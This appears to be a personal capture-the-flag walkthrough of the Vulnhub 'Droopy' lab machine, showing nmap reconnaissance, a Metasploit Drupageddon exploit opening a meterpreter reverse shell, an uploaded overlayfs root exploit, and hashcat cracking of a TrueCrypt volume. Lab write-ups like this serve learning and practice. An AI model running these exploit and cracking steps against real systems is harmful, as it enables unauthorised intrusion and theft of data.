This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. Just to be clear I am not a security professional, I am just learning and preparing myself to OCSP exam. If you found any mistake please let me know.
First we do some network discovery with netdiscover:
We see that host is at 192.168.1.159. Let’s do nmap scan:
nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0
NMAP shows in this machine there is a website hosted by Apache webserver and Drupal is running on it. I’ve investigated the site and it requires login and password. Fire up Metasploit Framework and let’s do a quick check, find an exploit suitable to our victim. Because Drupal uses MySQL database its quite trivial that a SQL injection could work.
I choosed the third one and fingers crossed. Boom, we have a meterpreter connection.
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options
Module options (exploit/multi/http/drupal_drupageddon):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 192.168.1.159 yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.1.200 yes The listen address
LPORT 4444 yes The listen port
0 Drupal 7.0 – 7.31
msf exploit(drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 – Testing page
[*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Trying to parse enabled modules
[*] 192.168.1.159:80 – Enabling the PHP filter module
[*] 192.168.1.159:80 – Setting permissions for PHP filter module
[*] 192.168.1.159:80 – Getting tokens from create new article page
[*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200
Nice news, let’s lurk around and get informations out of the system. I used sysinfo command and let’s see what is it.
meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
So this is an Ubuntu machine with an old kernel. I am trying my luck and check if this machine is vulnerable to overlayfs vulnerability or not, what user persmissions I have, am I able to compile my exploit with gcc and run it.
First transfer the exploit to /tmp folder with meterpreter’s upload command and try to execute it:
meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
gcc 37292.c -o exploit
chmod +x exploit
child threads done
creating shared library
sh: 0: can’t access tty; job control turned off
Nice, we have root access to the system, let’s find the flag. Usually flag takes place in the root directory, so let’s see what we have.
Dave.tc? Wut? After googling a bit I found that .tc extension could be a TrueCrypt password protected file. Google says that TrueCrypt are discontinued and password protected volumes can be hacked with proper program and with a good dictionary. My first thought was OclHashcat because I have an AMD card, and truecracker in Kali Linux supports Nvidia card (only?). I didn’t do research if it supports AMD too, because I am happy with OclHashcat. When I downloaded this vulnerable machine I saw two hints:
1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.
Okay, I have rockyou wordlist so check /var/mail:
Okay, let’s rock:
oclHashcat64.exe -a 0 -m 6211 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”
Exhausted. Nothing. At this point several hours later still nothing. I tried to apply rules (best64), different dictionaries, nothing. The last sentence also could give a hint, I did a dictionary combinaton attack ( downloaded lyrics from The Jam, did a dictionary from this and combinated with rockyou). Still no luck. Will I fail at this point? This was so easy until this point. TRY HARDER! So I did a break and when I sit front of my computer again I had clue. What if I am trying with wrong hashing algorithm? Some guys on hashcat forums mentioned that should try SHA512 algorithm instead of RipeMD160. Okay, fire up OclHashcat again.
oclHashcat64.exe -a 0 -m 6221 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”
After a couple of minutes it finished. Cracked. Okay, lets install TrueCrypt and check what we got. When it prompt for password I tried Copy/Paste and….. Wrong password. OMG what happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted to drive H:
Check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!
I opened this one and under the .top folder I captured the flag.
This was quite fun! Thank you!